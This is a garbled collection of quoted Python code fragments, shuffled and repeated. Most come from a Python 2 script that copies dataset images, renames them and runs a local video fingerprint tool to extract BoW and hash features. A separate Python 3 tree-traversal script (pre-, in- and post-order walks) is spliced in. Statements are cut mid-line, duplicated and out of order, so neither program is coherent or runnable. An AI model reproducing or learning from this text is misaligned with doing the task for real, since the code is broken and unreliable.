"list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if", "dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time", "feature from image No. %d , %d dirs in total\" % ((i +", "+ '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' +", "in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract", "print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction", "%d dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print", "f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames", "/opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print", "img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' +", "newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' +", "shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def", ".hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))", "shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash", "1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow", "filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = []", "for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" +", "+ '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path)", "len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\"", ", %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time()", "fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names))", "根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt',", "all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name in filenames:", ":return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs = '/opt/dongsl/tmp2/tmp/'", "return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f:", "succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text", "'.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with", "os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\"", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature", "+ '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' +", "查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir)", "as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())", "'/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = []", "+ '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature", "= time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path)", "img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt',", "+ '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as", "os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4", "'/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print", "os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names)", "26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print", "img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) +", "get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time()", "open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting", "print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧", "\"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统", "for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath,", "print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names = []", "+ eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile", "coding=utf-8 import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for", "from image No. %d , %d dirs in total\" % ((i + 1),", "print \"extracting feature from image No. %d , %d dirs in total\" %", "+ \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow", "all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r')", "if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src", "name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d dirs in", ".txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if", "'/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names)) + '", "/opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list", "time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'):", "name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs,", "%d , %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time =", "(j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick", "print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): '''", "import time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path,", "for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames,", "cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1", "print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for", "dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature", "endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs", "os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path):", "def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file", "''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs = '/opt/dongsl/tmp2/tmp/' feature_generator_query(query_dir_imgs)", "print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \"", "filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file", "i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name", "item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1)", "not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path", "(end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\"", ".bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir),", "os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/'", "= get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d'", "[] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name)", "((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time -", "/opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\"", "1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path)", "extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names", "feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash", "total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\",", "信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__", "starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names =", "os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs,", "eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "\"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy", "= [] for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if", "\"extracting feature from image No. %d , %d dirs in total\" % ((i", "' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow", "...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param", "targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/", "time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for", "'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d", "file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name in", "= f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir):", "for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j,", "/opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash '", "img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash'", "No. %d , %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time", "f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath,", "+ '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. %d", "% ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time", "\" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow", "+ 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time))", "\"src path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir", "img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/", "4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash'", "+ '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick)", "if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! attation!\"", "eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile", "\".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path +", "f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir)", "for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for", "return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd", "+ 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick =", "\" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in", "os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in", "% (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names)", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img):", "img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No.", "1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash", "= get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1", "'/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(", "+ img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] +", "+ os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) +", "+ img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] +", "')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile):", "not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile))", "in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names):", "' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) +", "img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1]", "(\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends", "target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\":", "in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs =", "all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp", "get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' %", "names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname +", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' +", "'.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:", "in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in", "\"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names", "'/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from", ":param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ ==", "+ \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path" ]
[ "walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable,", "q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent,", "= [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "parent: Callable): if node is not None: result.append(node) if left(node) is not None:", "import Callable from queue import Queue \"\"\"A type of depth-first walk of a", "print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list):", "\"data\" : data } return node def make_tree(items: list): tree = [] q", "left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if", "parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = []", "current_parent = q.get(block=False) if q.empty() is False else None for item in items:", "list, left: Callable, right: Callable, parent: Callable): if node is not None: if", "parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node", "left = node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if", "node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result)", "print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22,", "in node def make_node(data): node = { \"data\" : data } return node", "in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25,", "\"left\" in node and \"right\" in node def make_node(data): node = { \"data\"", "right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A", "15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result", "None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s:", "if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not", "walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable,", "not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right, parent)", "print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "q = Queue() current_parent = q.get(block=False) if q.empty() is False else None for", "if q.empty() is False else None for item in items: print('DEBUG: adding item", "print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node", "node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0],", "Callable): if node is not None: if left(node) is not None: in_order_walk(left(node), result,", "return \"left\" in node and \"right\" in node def make_node(data): node = {", "None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "node else None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s", "result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"]", "of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right:", "node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\")", "not None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if", "None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a", "node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s %s\" %", "9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0],", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result", "not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of", "in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left =", "return tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if", "node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\"", "queue import Queue \"\"\"A type of depth-first walk of a tree (parent, left,", "post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "[] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list,", "full\") def is_full(node) -> bool: return \"left\" in node and \"right\" in node", "def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16,", "tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\"", "from typing import Callable from queue import Queue \"\"\"A type of depth-first walk", "if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node", "is full\") def is_full(node) -> bool: return \"left\" in node and \"right\" in", "None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if", "current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent", "\"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node:", "post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"],", "right: Callable, parent: Callable): if node is not None: result.append(node) if left(node) is", "node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left,", "\"right\" in node else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"],", "= Queue() current_parent = q.get(block=False) if q.empty() is False else None for item", "(left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None)", "parent: Callable): if node is not None: if left(node) is not None: post_order_walk(left(node),", "False else None for item in items: print('DEBUG: adding item %s' % item)", "result, left, right, parent) \"\"\"A type of depth-first walk of a tree (left,", "type of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result:", "print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent", "node is not None: if left(node) is not None: post_order_walk(left(node), result, left, right,", "of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list,", "if \"right\" in node else None print(\"%s <- %s: %s %s\" % (parent,", "[] q = Queue() current_parent = q.get(block=False) if q.empty() is False else None", "None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) 